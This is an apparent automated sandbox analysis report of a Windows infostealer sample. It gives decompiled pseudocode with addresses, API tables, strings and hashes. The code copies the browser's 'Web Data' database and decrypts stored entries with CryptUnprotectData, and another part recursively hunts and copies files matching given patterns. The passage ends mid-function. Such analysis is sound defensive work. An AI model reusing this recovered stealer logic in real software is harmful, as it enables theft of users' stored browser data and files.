				_t119 =  *((intOrPtr*)( *0x40e0b0))( &_v68,  &_v28, 0, 0, 0, 0,  &_v76); // executed
				if(_t119 != 0) {
					_t205 = E0040177F(_v72,  &_v24, _v76);
					_t275 = _v24;
					if(_t205 != 0) {
						 *_t209 =  *((intOrPtr*)( *0x40e13c))( *_t209, _t275);
					}
				}
				if(_v28 != 0) {
					LocalFree(_v28);
				}
				if(_v64 != 0) {
					LocalFree(_v64);
				}
				if(_v72 != 0) {
					LocalFree(_v72);
				}
				if(_t275 != 0) {
					LocalFree(_t275);
				}
				if(_t265 != 0) {
					LocalFree(_t265);
				}
				_t276 = _a16;
				if(_t276 == 0) {
					L57:
					return 0;
				} else {
					_t122 =  *((intOrPtr*)( *0x40e0d4))(_t276,  *0x40e1c4);
					 *0x40e4d4 = _t122;
					_t124 =  *((intOrPtr*)( *0x40e0d4))(_t276,  *0x40e1f8);
					 *0x40e4c8 = _t124;
					_t126 =  *((intOrPtr*)( *0x40e0d4))(_t276,  *0x40e1e0);
					 *0x40e4bc = _t126;
					_t128 =  *((intOrPtr*)( *0x40e0d4))(_t276,  *0x40e208);
					 *0x40e4c4 = _t128;
					_t130 =  *((intOrPtr*)( *0x40e0d4))(_t276,  *0x40e230);
					 *0x40e4cc = _t130;
					_t132 =  *((intOrPtr*)( *0x40e0d4))(_t276,  *0x40e1c0);
					 *0x40e4b8 = _t132;
					_t134 =  *((intOrPtr*)( *0x40e0d4))(_t276,  *0x40e224);
					 *0x40e4c0 = _t134;
					 *0x40e4d0 =  *((intOrPtr*)( *0x40e0d4))(_t276,  *0x40e1b0);
					_t138 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
					_t139 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
					_v32 = _t139;
					_t278 =  *((intOrPtr*)( *0x40e000))(_t138, _a8, L"Web Data");
					_v60 = _t278;
					_t141 = E0040A69E( *0x40e000,  &_v32);
					_t210 = _v32;
					if(_t141 == 0) {
						L59:
						LocalFree(_t278);
						DeleteFileW(_t210);
						return LocalFree(_t210) | 0xffffffff;
					}
					_t146 = CopyFileW(_t278, _t210, 0); // executed
					if(_t146 == 0) {
						goto L59;
					}
					_t148 =  *0x40e4c8(_t210,  &_v24); // executed
					if(_t148 == 0) {
						if(_v24 != 0) {
							_t150 =  *0x40e4d4(_v24,  *0x40e1d4, 0xffffffff,  &_a16, 0); // executed
							_t285 = _t284 + 0x14;
							if(_t150 == 0) {
								_push(_a16);
								if( *0x40e4cc() != 0x64) {
									L53:
									if(_t278 != 0) {
										LocalFree(_t278);
									}
									 *0x40e4bc(_a16);
									 *0x40e4c4(_v24); // executed
									DeleteFileW(_t210); // executed
									if(_t210 != 0) {
										LocalFree(_t210);
									}
									goto L57;
								}
								_t211 = _v48;
								_t268 = 1;
								do {
									_t157 =  *0x40e4b8(_a16, 0);
									_v48 = _t157;
									_t158 =  *0x40e4b8(_a16, 2);
									_v44 = _t158;
									_t159 =  *0x40e4b8(_a16, 3);
									_v40 = _t159;
									_t160 =  *0x40e4c0(_a16, _t268);
									_t279 = _t160;
									_v36 = _t279;
									_t161 =  *0x40e4c0(_a16, 0);
									_t285 = _t285 + 0x28;
									if(_t161 < _t268) {
										goto L51;
									}
									_push(_t268);
									_push(_a16);
									if( *0x40e4c0() < _t268) {
										goto L51;
									}
									_push(2);
									_push(_a16);
									if( *0x40e4c0() < _t268) {
										goto L51;
									}
									_push(3);
									_push(_a16);
									if( *0x40e4c0() < _t268) {
										goto L51;
									}
									_t269 =  *0x40e4d0(_a16, _t268);
									_t57 = _t279 + 0x40; // 0x40
									_t167 =  *((intOrPtr*)( *0x40e044))(0x40, _t57);
									_t168 =  *((intOrPtr*)( *0x40e050))(_t167, _t269);
									_v52 = _t168;
									_v12 =  *_t168;
									_v11 =  *((intOrPtr*)(_t168 + 1));
									_v10 =  *((intOrPtr*)(_t168 + 2));
									_v9 = 0;
									if(_t269 == 0) {
										L50:
										LocalFree(_t168);
										_t268 = 1;
										goto L51;
									}
									_t280 =  *((intOrPtr*)( *0x40e044))(0x40, 0x2000);
									_t172 =  *0x40e1c8; // 0x60e150
									_v20 = _t172;
									_push("v10");
									_push( &_v12);
									_v8 = _t280;
									if( *((intOrPtr*)( *0x40e084))() != 0) {
										_push( &_v84);
										_v88 = _t269;
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_v92 = 0x200;
										_push( &_v92);
										if( *((intOrPtr*)( *0x40e0b0))() == 0) {
											_t281 = _v8;
											L47:
											if(_t281 != 0) {
												LocalFree(_t281);
											}
											_t168 = _v52;
											goto L50;
										}
										 *((char*)(_v84 + _v80)) = 0;
										_t179 = E0040A4C2(_v80);
										_v36 = _t179;
										_t180 =  *((intOrPtr*)( *0x40e0ec))(_t280, _v20, _t179, _v48, _v44, _v40);
										_t285 = _t285 + 0x18;
										_t181 = lstrlenW(_v20);
										_t281 = _v8;
										if(_t180 >= _t181) {
											 *_t211 = E0040A503( *_t211, _t281);
										}
										if(_v80 != 0) {
											LocalFree(_v80);
										}
										LocalFree(_v36);
										L39:
										goto L47;
									}
									_v16 =  *((intOrPtr*)( *0x40e044))(0x40, _v36 << 2);
									if(E0040177F(_t269,  &_v16, _v36) == 0) {
										_t281 = _v8;
									} else {
										_t190 =  *((intOrPtr*)( *0x40e0ec))(_t280, _v20, _v16, _v48, _v44, _v40);
										_t285 = _t285 + 0x18;
										_t191 = lstrlenW(_v20);
										_t281 = _v8;
										if(_t190 >= _t191) {
											 *_t211 = E0040A503( *_t211, _t281);
										}
									}
									if(_v16 == 0) {
										goto L47;
									} else {
										LocalFree(_v16);
										goto L39;
									}
									L51:
									_push(_a16);
								} while ( *0x40e4cc() == 0x64);
								_t210 = _v32;
								_t278 = _v60;
								goto L53;
							}
							LocalFree(_t278);
							LocalFree(_t210);
							 *0x40e4c4(_v24);
							_t196 = 0xfffffffd;
							return _t196;
						}
						_t273 = 0xfffffffe;
						L22:
						LocalFree(_t278);
						LocalFree(_t210);
						return _t273;
					}
					_t273 = 0xffffffffffffffff;
					goto L22;
				}
			}

0x0040324b
0x0040324d
0x00403250
0x0040325c
0x0040325e
0x00403265
0x0040326d
0x00403278
0x00403286
0x0040328f
0x00403292
0x0040329c
0x004032a9
0x004032ac
0x004032b9
0x004032bb
0x004032be
0x004032c3
0x004032c3
0x004032e1
0x004032e5
0x004032f0
0x004032f5
0x004032fb
0x00403307
0x00403307
0x004032fb
0x0040330d
0x00403312
0x00403312
0x0040331c
0x00403321
0x00403321
0x0040332b
0x00403330
0x00403330
0x00403338
0x0040333b
0x0040333b
0x00403343
0x00403346
0x00403346
0x0040334c
0x00403351
0x0040373f
0x00000000
0x00403357
0x00403363
0x0040336b
0x00403376
0x0040337e
0x00403389
0x00403391
0x0040339c
0x004033a4
0x004033af
0x004033b7
0x004033c2
0x004033ca
0x004033d5
0x004033dd
0x004033ef
0x004033fc
0x00403409
0x00403419
0x0040341f
0x00403424
0x00403427
0x0040342c
0x00403431
0x00403746
0x00403747
0x0040374e
0x00000000
0x0040375b
0x00403441
0x00403445
0x00000000
0x00000000
0x00403450
0x0040345a
0x00403465
0x00403490
0x00403496
0x0040349b
0x004034bd
0x004034ca
0x0040370e
0x00403710
0x00403713
0x00403713
0x0040371c
0x00403725
0x0040372e
0x00403736
0x00403739
0x00403739
0x00000000
0x00403736
0x004034d0
0x004034d5
0x004034d6
0x004034db
0x004034e6
0x004034e9
0x004034f4
0x004034f7
0x00403501
0x00403504
0x0040350f
0x00403511
0x00403514
0x0040351a
0x0040351f
0x00000000
0x00000000
0x00403525
0x00403526
0x00403533
0x00000000
0x00000000
0x00403539
0x0040353b
0x00403548
0x00000000
0x00000000
0x0040354e
0x00403550
0x0040355d
0x00000000
0x00000000
0x00403573
0x00403577
0x0040357d
0x00403587
0x00403589
0x0040358e
0x00403594
0x0040359a
0x0040359d
0x004035a3
0x004036eb
0x004036ec
0x004036f4
0x00000000
0x004036f4
0x004035bd
0x004035bf
0x004035c4
0x004035ca
0x004035cf
0x004035d0
0x004035d7
0x0040365d
0x00403660
0x00403663
0x00403664
0x00403665
0x00403666
0x00403667
0x0040366b
0x00403672
0x00403677
0x004036da
0x004036dd
0x004036df
0x004036e2
0x004036e2
0x004036e8
0x00000000
0x004036e8
0x0040367f
0x00403683
0x0040369d
0x004036a5
0x004036a7
0x004036af
0x004036b3
0x004036b6
0x004036c1
0x004036c1
0x004036c7
0x004036cc
0x004036cc
0x0040364a
0x0040364a
0x00000000
0x0040364a
0x004035f0
0x004035fd
0x0040363a
0x004035ff
0x0040361a
0x0040361c
0x00403624
0x00403628
0x0040362b
0x00403636
0x00403636
0x0040362b
0x00403641
0x00000000
0x00403647
0x0040364a
0x00000000
0x0040364a
0x004036f5
0x004036f5
0x004036ff
0x00403708
0x0040370b
0x00000000
0x0040370b
0x0040349e
0x004034a5
0x004034ae
0x004034b7
0x00000000
0x004034b7
0x00403469
0x0040346a
0x0040346b
0x00403472
0x00000000
0x00403478
0x0040345c
0x00000000
0x0040345c

APIs

LocalFree.KERNEL32(00000000), ref: 004032C3

Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701

CryptUnprotectData.CRYPT32(00000200,00000000,00000000,00000000,00000000,00000000,?), ref: 004032E1
LocalFree.KERNEL32(00000000), ref: 00403312
LocalFree.KERNEL32(00000000), ref: 00403321
LocalFree.KERNEL32(00000000), ref: 00403330
LocalFree.KERNEL32(00000000), ref: 0040333B
LocalFree.KERNEL32(00000000), ref: 00403346
CopyFileW.KERNEL32(00000000,?,00000000), ref: 00403441
LocalFree.KERNEL32(00000000), ref: 0040346B
LocalFree.KERNEL32(?), ref: 00403472
LocalFree.KERNEL32(00000000), ref: 0040349E
LocalFree.KERNEL32(?), ref: 004034A5
LocalFree.KERNEL32(00000000), ref: 00403747
DeleteFileW.KERNEL32(?), ref: 0040374E
LocalFree.KERNEL32(?), ref: 00403755

Strings

P`, xrefs: 004035BF
Web Data, xrefs: 00403411
v10, xrefs: 004035CA

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal$File$CopyCryptDataDeleteUnprotect
String ID: P`$Web Data$v10
API String ID: 1742448742-1262047465
Opcode ID: 335e0ac9f1cd56e4f781c799e5ddc7ca7be3cb741a549f9799a327d6795ce13d
Instruction ID: 7d7504f3382372b0d825977313a65c8cc92f857bae52c0927fac6ea5572d7f51
Opcode Fuzzy Hash: 335e0ac9f1cd56e4f781c799e5ddc7ca7be3cb741a549f9799a327d6795ce13d
Instruction Fuzzy Hash: 1FF1A171900214EFDB15DFA6EE44AAE7BB9FB08311F104835F511B72A0DB759E20CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00405B5B Relevance: 47.6, APIs: 21, Strings: 6, Instructions: 372
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 46%

			E00405B5B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20, WCHAR* _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr* _a36, intOrPtr _a40, char _a44) {
				void* _v12;
				signed int _v16;
				void* _v20;
				void* _v24;
				WCHAR* _v28;
				void* _v32;
				void* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* _v48;
				void* _v52;
				signed int _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				struct _WIN32_FIND_DATAW _v664;
				void* __ebx;
				void* __esi;
				void* _t112;
				signed int _t114;
				void* _t117;
				void* _t119;
				void* _t120;
				void* _t121;
				WCHAR* _t122;
				int _t125;
				void* _t127;
				WCHAR* _t129;
				intOrPtr _t135;
				WCHAR* _t136;
				void* _t138;
				void* _t140;
				signed int _t144;
				signed int _t148;
				WCHAR* _t151;
				WCHAR* _t158;
				WCHAR* _t162;
				void* _t167;
				unsigned int _t175;
				WCHAR* _t177;
				WCHAR* _t182;
				void* _t186;
				WCHAR* _t189;
				void* _t191;
				WCHAR* _t192;
				void* _t194;
				void* _t195;
				WCHAR* _t196;
				void* _t201;
				void* _t202;
				char* _t232;
				intOrPtr _t233;
				intOrPtr _t239;
				WCHAR* _t245;
				intOrPtr _t249;
				signed int _t251;
				signed int _t252;
				WCHAR* _t253;
				void* _t254;
				void* _t255;
				void* _t259;
				void* _t260;
				unsigned int _t261;
				void* _t262;
				void* _t264;
				void* _t265;
				void* _t267;

				_t1 =  &_a44; // 0x406321
				_t249 =  *_t1;
				_v44 = __edx;
				_v40 = __ecx;
				if(_t249 <= _a40) {
					_v16 = _v16 & 0x00000000;
					_t112 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
					_t195 =  *((intOrPtr*)( *0x40e13c))(_t112, _a4);
					_v52 = _t195;
					_t114 =  *((intOrPtr*)( *0x40e08c))(_t195);
					_t201 = 0x5c;
					__eflags =  *((intOrPtr*)(_t195 + _t114 * 2 - 2)) - _t201;
					_t202 = _t195;
					if( *((intOrPtr*)(_t195 + _t114 * 2 - 2)) == _t201) {
						_push( *0x40e3d0);
						_v16 = 1;
					} else {
						_push( *0x40e1d0);
					}
					E0040188C(_t195, _t202, 0x104, _t259);
					_t117 = FindFirstFileW(_t195,  &_v664); // executed
					_v36 = _t117;
					__eflags = _t117 - 0xffffffff;
					if(_t117 != 0xffffffff) {
						_t260 = _v36;
						_t196 = _v16;
						do {
							__eflags = _v664.dwFileAttributes & 0x00000010;
							if((_v664.dwFileAttributes & 0x00000010) == 0) {
								_t119 = LocalAlloc(0x40, 0x410); // executed
								_t120 =  *((intOrPtr*)( *0x40e13c))(_t119, _a4);
								__eflags = _t196;
								if(_t196 == 0) {
									_t233 =  *0x40e258; // 0x5f5740
									_t120 = E0040A503(_t120, _t233);
								}
								_t232 =  &(_v664.cFileName);
								_t121 = E0040A503(_t120, _t232);
								_t261 = _v664.nFileSizeHigh;
								_t251 = _v664.nFileSizeLow;
								__eflags = _a24;
								_v12 = _t121;
								if(_a24 == 0) {
									_t122 = 0;
									__eflags = 0;
								} else {
									_t232 = L"*.lnk";
									_t122 = E0040A70E( &(_v664.cFileName), _t232);
								}
								__eflags = _v12;
								_v28 = _t122;
								if(_v12 == 0) {
									L52:
									LocalFree(_v12);
									goto L53;
								} else {
									_t135 = _a28;
									_t252 = (_t261 << 0x00000020 | _t251) >> 0xa;
									asm("cdq");
									__eflags = _t261 >> 0xa - _t232;
									if(__eflags > 0) {
										goto L52;
									}
									if(__eflags < 0) {
										L23:
										_t136 = E0040A70E( &(_v664.cFileName), _a12);
										__eflags = _t136;
										if(_t136 == 0) {
											L25:
											_t253 = _v28;
											__eflags = _t253;
											if(_t253 == 0) {
												goto L52;
											}
											L28:
											_t138 =  *((intOrPtr*)( *0x40e044))(0x40, 0x618);
											_t140 = E0040A503( *((intOrPtr*)( *0x40e13c))(_t138,  *0x40e1b8), _v40);
											_t239 =  *0x40e1b8; // 0x5f58e0
											_v20 = E0040A503(E0040A503(_t140, _t239), _v44);
											__eflags = _t253;
											if(_t253 == 0) {
												_t264 = 0;
												__eflags = 0;
											} else {
												_t191 = E00408FA5(_v12); // executed
												_t264 = _t191;
											}
											_t144 =  *((intOrPtr*)( *0x40e044))(0x40, 0x618);
											_v16 = _t144;
											_v32 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
											__eflags = _t253;
											if(_t253 != 0) {
												_t186 =  *((intOrPtr*)( *0x40e08c))(_t264);
												__eflags = _t186 - 4;
												if(_t186 > 4) {
													_t189 =  *((intOrPtr*)( *0x40e0e0))(_t264, 0, 0x5c) + 2;
													__eflags = _t189;
													StrCpyW(_v32, _t189);
												}
											}
											_t148 =  *((intOrPtr*)( *0x40e08c))(_a8);
											__eflags = _t253;
											_t150 =  !=  ? _v32 : 0;
											_t151 = E0040A2AA(_v12 + _t148 * 2,  &_v16,  !=  ? _v32 : 0);
											__eflags = _t151;
											if(_t151 == 0) {
												L51:
												LocalFree(_v32);
												LocalFree(_v16);
												LocalFree(_v20);
												goto L52;
											} else {
												_t218 = _v20;
												_v20 = E0040A503(_v20, _v16);
												__eflags = _t253;
												if(_t253 == 0) {
													_t254 = _v12;
													L41:
													_v24 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
													_t158 = E0040A69E(_t218,  &_v24);
													_t265 = _v24;
													__eflags = _t158;
													if(_t158 == 0) {
														L50:
														DeleteFileW(_t265);
														LocalFree(_t265);
														goto L51;
													}
													_t162 =  *((intOrPtr*)( *0x40e184))(_t254, _t265, 0);
													__eflags = _t162;
													if(_t162 == 0) {
														goto L50;
													}
													_t255 =  *((intOrPtr*)( *0x40e03c))(_t265, 0x80000000, 1, 0, 4, 0, 0);
													 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _v20, 0xffffffff, 0, 0, 0, 0);
													_v48 = 0;
													_t167 =  *((intOrPtr*)( *0x40e044))(0x40, 0x30c);
													_t245 = _v48;
													_v24 = 0;
													__eflags = _t245;
													if(_t245 == 0) {
														L49:
														LocalFree(_t167);
														CloseHandle(_t255);
														goto L50;
													}
													 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _v20, 0xffffffff, 0, _t245, 0, 0);
													__eflags = 0;
													if(0 == 0) {
														L48:
														_t167 = _v24;
														goto L49;
													}
													__eflags = _v28;
													if(_v28 == 0) {
														L47:
														_t223 = _a36;
														_v56 = _v56 & 0x00000000;
														_v68 = _v24;
														_v64 = _t255;
														_v60 = _t265;
														 *_t223 =  *_a36 + 1;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														goto L51;
													}
													_t175 =  *((intOrPtr*)( *0x40e14c))(_t255, 0);
													__eflags = _t175 >> 0xa - _a28;
													if(_t175 >> 0xa >= _a28) {
														goto L48;
													}
													goto L47;
												}
												_t177 = E0040A70E(_t264, _a12);
												__eflags = _t177;
												if(_t177 == 0) {
													L39:
													LocalFree(_v32);
													LocalFree(_v12);
													LocalFree(_v20);
													LocalFree(_v16);
													LocalFree(_t264);
													L53:
													_t107 =  &_a44; // 0x406321
													_t249 =  *_t107;
													L54:
													_t260 = _v36;
													goto L55;
												}
												_t218 = _t264;
												_t182 = E0040A70E(_t264, _a16);
												__eflags = _t182;
												if(_t182 != 0) {
													goto L39;
												}
												_t254 =  *((intOrPtr*)( *0x40e13c))(_v12, _t264);
												_v12 = _t254;
												LocalFree(_t264);
												goto L41;
											}
										}
										_t192 = E0040A70E( &(_v664.cFileName), _a16);
										__eflags = _t192;
										if(_t192 == 0) {
											_t253 = _v28;
											goto L28;
										}
										goto L25;
									}
									__eflags = _t252 - _t135;
									if(_t252 >= _t135) {
										goto L52;
									}
									goto L23;
								}
							}
							__eflags = _v664.cFileName - 0x2e;
							if(_v664.cFileName == 0x2e) {
								goto L55;
							}
							__eflags = _a20;
							if(_a20 == 0) {
								goto L55;
							}
							_t127 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
							_t262 =  *((intOrPtr*)( *0x40e000))(_t127, _a4,  &(_v664.cFileName));
							_t129 = E0040A70E( &(_v664.cFileName), _a16);
							__eflags = _t129;
							if(_t129 == 0) {
								_t26 = _t249 + 1; // 0x1
								E00405B5B(_v40, _v44, _t262, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _t26); // executed
								_t267 = _t267 + 0x2c;
							}
							LocalFree(_t262);
							goto L54;
							L55:
							_t125 = FindNextFileW(_t260,  &_v664); // executed
							__eflags = _t125;
						} while (_t125 != 0);
						_t110 =  &_v52; // 0x406321
						LocalFree( *_t110);
						FindClose(_t260);
						goto L57;
					} else {
						LocalFree(_t195);
						L57:
						__eflags = 0;
						return 0;
					}
				}
				_t194 = 2;
				return _t194;
			}

0x00405b67
0x00405b67
0x00405b6a
0x00405b6d
0x00405b73
0x00405b82
0x00405b8d
0x00405ba1
0x00405ba4
0x00405ba7
0x00405bab
0x00405bb1
0x00405bb6
0x00405bb8
0x00405bc2
0x00405bc8
0x00405bba
0x00405bba
0x00405bba
0x00405bcf
0x00405be1
0x00405be3
0x00405be6
0x00405be9
0x00405bf7
0x00405bfa
0x00405bfd
0x00405bfd
0x00405c04
0x00405c9d
0x00405ca9
0x00405cab
0x00405cad
0x00405caf
0x00405cb7
0x00405cb7
0x00405cbc
0x00405cc4
0x00405cc9
0x00405cd1
0x00405cd7
0x00405cdb
0x00405cde
0x00405cf2
0x00405cf2
0x00405ce0
0x00405ce0
0x00405ceb
0x00405ceb
0x00405cf4
0x00405cf8
0x00405cfb
0x00405fad
0x00405fb0
0x00000000
0x00405d01
0x00405d01
0x00405d04
0x00405d08
0x00405d0c
0x00405d0e
0x00000000
0x00000000
0x00405d14
0x00405d1e
0x00405d27
0x00405d2c
0x00405d2e
0x00405d42
0x00405d42
0x00405d45
0x00405d47
0x00000000
0x00000000
0x00405d52
0x00405d5e
0x00405d74
0x00405d79
0x00405d90
0x00405d93
0x00405d95
0x00405da3
0x00405da3
0x00405d97
0x00405d9a
0x00405d9f
0x00405d9f
0x00405db1
0x00405db8
0x00405dc4
0x00405dc7
0x00405dc9
0x00405dd2
0x00405dd4
0x00405dd7
0x00405de5
0x00405de5
0x00405dec
0x00405dec
0x00405dd7
0x00405dfa
0x00405e04
0x00405e09
0x00405e0e
0x00405e14
0x00405e16
0x00405f92
0x00405f95
0x00405f9e
0x00405fa7
0x00000000
0x00405e1c
0x00405e1f
0x00405e27
0x00405e2a
0x00405e2c
0x00405e8d
0x00405e90
0x00405ea1
0x00405ea4
0x00405ea9
0x00405eac
0x00405eae
0x00405f84
0x00405f85
0x00405f8c
0x00000000
0x00405f8c
0x00405ebd
0x00405ebf
0x00405ec1
0x00000000
0x00000000
0x00405ee3
0x00405ef6
0x00405f05
0x00405f08
0x00405f0a
0x00405f0d
0x00405f10
0x00405f12
0x00405f76
0x00405f77
0x00405f7e
0x00000000
0x00405f7e
0x00405f2c
0x00405f2e
0x00405f30
0x00405f73
0x00405f73
0x00000000
0x00405f73
0x00405f32
0x00405f36
0x00405f4a
0x00405f4a
0x00405f50
0x00405f54
0x00405f59
0x00405f65
0x00405f6b
0x00405f6d
0x00405f6e
0x00405f6f
0x00405f70
0x00000000
0x00405f70
0x00405f40
0x00405f45
0x00405f48
0x00000000
0x00000000
0x00000000
0x00405f48
0x00405e33
0x00405e38
0x00405e3a
0x00405e63
0x00405e66
0x00405e6f
0x00405e78
0x00405e81
0x00405fb0
0x00405fb0
0x00405fb6
0x00405fb6
0x00405fb9
0x00405fb9
0x00000000
0x00405fb9
0x00405e3f
0x00405e41
0x00405e46
0x00405e48
0x00000000
0x00000000
0x00405e55
0x00405e58
0x00405e5b
0x00000000
0x00405e5b
0x00405e16
0x00405d39
0x00405d3e
0x00405d40
0x00405d4f
0x00000000
0x00405d4f
0x00000000
0x00405d40
0x00405d16
0x00405d18
0x00000000
0x00000000
0x00000000
0x00405d18
0x00405cfb
0x00405c0a
0x00405c12
0x00000000
0x00000000
0x00405c18
0x00405c1c
0x00000000
0x00000000
0x00405c2e
0x00405c4c
0x00405c4e
0x00405c53
0x00405c55
0x00405c57
0x00405c7d
0x00405c82
0x00405c82
0x00405c86
0x00000000
0x00405fbc
0x00405fc9
0x00405fcb
0x00405fcb
0x00405fd3
0x00405fd7
0x00405fde
0x00000000
0x00405beb
0x00405bec
0x00405fe4
0x00405fe4
0x00000000
0x00405fe4
0x00405be9
0x00405b77
0x00000000

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 00405BE1
LocalFree.KERNEL32(00000000), ref: 00405BEC

Strings

!c@, xrefs: 00405B67, 00405FB6
*.lnk, xrefs: 00405CE0
@W_, xrefs: 00405CAF
!c@, xrefs: 00405FD3, 00405FD6
., xrefs: 00405C0A
X_, xrefs: 00405D79

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: FileFindFirstFreeLocal
String ID: !c@$!c@$*.lnk$.$@W_$X_
API String ID: 972134204-1447687682
Opcode ID: 51bada7883c752375f3f92a8e760012b1f35e1d27b753d419d63b605c17ec454
Instruction ID: a0bd4d6dd4f3a97f7616e57fc29639dad099fc1712c2800218aeb084a22374ad
Opcode Fuzzy Hash: 51bada7883c752375f3f92a8e760012b1f35e1d27b753d419d63b605c17ec454
Instruction Fuzzy Hash: 75D1AC71A00216ABEF04DFA5CD44EAF7775EF48300F104929FA15B72A0DB78A951CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040B177 Relevance: 38.8, APIs: 19, Strings: 3, Instructions: 275
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 27%

			E0040B177(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20) {
				char _v568;
				struct _WIN32_FIND_DATAW _v616;
				WCHAR* _v632;
				void* _v640;
				signed int _v648;
				void* _v660;
				void* _v664;
				intOrPtr _v684;
				void* _v688;
				WCHAR* _v696;
				void* _v716;
				void* _v732;
				intOrPtr _v748;
				intOrPtr _v760;
				char _v764;
				intOrPtr _v772;
				intOrPtr _v780;
				intOrPtr _v788;
				signed int _v800;
				void* _v804;
				void* _v812;
				void* _v816;
				void* _v820;
				void* _v824;
				void* _v828;
				void* _v836;
				void* __ebx;
				void* __esi;
				void* _t66;
				void* _t70;
				void* _t78;
				void* _t86;
				void* _t89;
				void* _t96;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t102;
				intOrPtr _t103;
				void* _t116;
				void* _t117;
				void* _t127;
				WCHAR* _t128;
				void* _t130;
				WCHAR* _t132;
				intOrPtr _t172;
				intOrPtr _t173;
				intOrPtr _t177;
				void* _t182;
				void* _t183;
				void* _t185;
				void* _t189;
				signed int _t190;
				void* _t192;
				void* _t194;
				signed int _t196;
				void* _t198;

				_t198 = (_t196 & 0xfffffff8) - 0x28c;
				_t183 = __edx;
				_t190 = __ecx;
				_v640 = __edx;
				_v648 = __ecx;
				_t66 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a, _t182, _t189, _t127);
				_t128 =  *((intOrPtr*)( *0x40e13c))(_t66, _a4);
				_v632 = _t128;
				E0040188C(_t128, _t128, 0x104, __ecx,  *0x40e1d0);
				_t70 = FindFirstFileW(_t128,  &_v616); // executed
				_v664 = _t70;
				if(_t70 == 0xffffffff) {
					L21:
					return 0;
				}
				_t130 = _t70;
				do {
					if((_v616.ftCreationTime & 0x00000010) == 0) {
						if(E0040A70E( &_v568, _a8) == 0 || E0040A70E( &_v568, _a12) != 0) {
							goto L19;
						} else {
							_t86 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
							_t185 =  *((intOrPtr*)( *0x40e000))(_t86, _a4,  &(_v616.dwReserved1));
							_v660 = _t185;
							_v696 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
							_t89 = E0040A69E( *0x40e044,  &_v696);
							_t132 = _v696;
							if(_t89 == 0) {
								L17:
								LocalFree(_t132);
								LocalFree(_t185);
								DeleteFileW(_t132);
								L18:
								_t130 = _v688;
								_t183 = _v684;
								goto L19;
							}
							_push(0);
							_push(_t132);
							_push(_t185);
							if( *((intOrPtr*)( *0x40e184))() == 0) {
								goto L17;
							}
							_t96 =  *((intOrPtr*)( *0x40e03c))(_t132, 0x80000000, 1, 0, 4, 0, 0);
							_v716 = _t96;
							GetFileSize(_t96, 0);
							_t98 =  *((intOrPtr*)( *0x40e044))(0x40, 0x618);
							_t99 =  *((intOrPtr*)( *0x40e13c))(_t98,  *0x40e1b8);
							_t172 =  *0x40e1b4; // 0x60e678
							_t100 = E0040A503(_t99, _t172);
							_t173 =  *0x40e1b8; // 0x5f58e0
							_t102 = E0040A503(E0040A503(_t100, _t173), _t190);
							_t103 =  *((intOrPtr*)( *0x40e044))(0x40, 0x618);
							_v760 = _t103;
							E0040A2AA(_t185 +  *((intOrPtr*)( *0x40e08c))(0) * 2,  &_v764, _v748);
							_t194 = E0040A503(_t102, _v764);
							_v732 = _t194;
							 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t194, 0xffffffff, 0, 0, 0, 0);
							_v772 = 0;
							 *((intOrPtr*)( *0x40e044))(0x40, 0x144);
							_t177 = _v780;
							_v788 = 0;
							if(_t177 == 0) {
								L16:
								LocalFree(_t132);
								LocalFree(_t194);
								LocalFree(_v804);
								LocalFree(_t185);
								L14:
								_t190 = _v800;
								goto L18;
							}
							 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t194, 0xffffffff, 0, _t177, 0, 0);
							if(0 != 0) {
								_t116 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
								_v804 = _v828;
								_v800 = _v824;
								_t117 =  *((intOrPtr*)( *0x40e13c))(_t116, _t132);
								_t160 = _a20;
								_v800 = _v800 & 0x00000000;
								_v804 = _t117;
								 *_t160 =  *_a20 + 1;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t185 = _v824;
								_t194 = _v820;
								goto L16;
							}
							LocalFree(_t194);
							LocalFree(_v820);
							LocalFree(_v836);
							LocalFree(_t132);
							LocalFree(_t185);
							CloseHandle(_v816);
							DeleteFileW(_t132);
							goto L14;
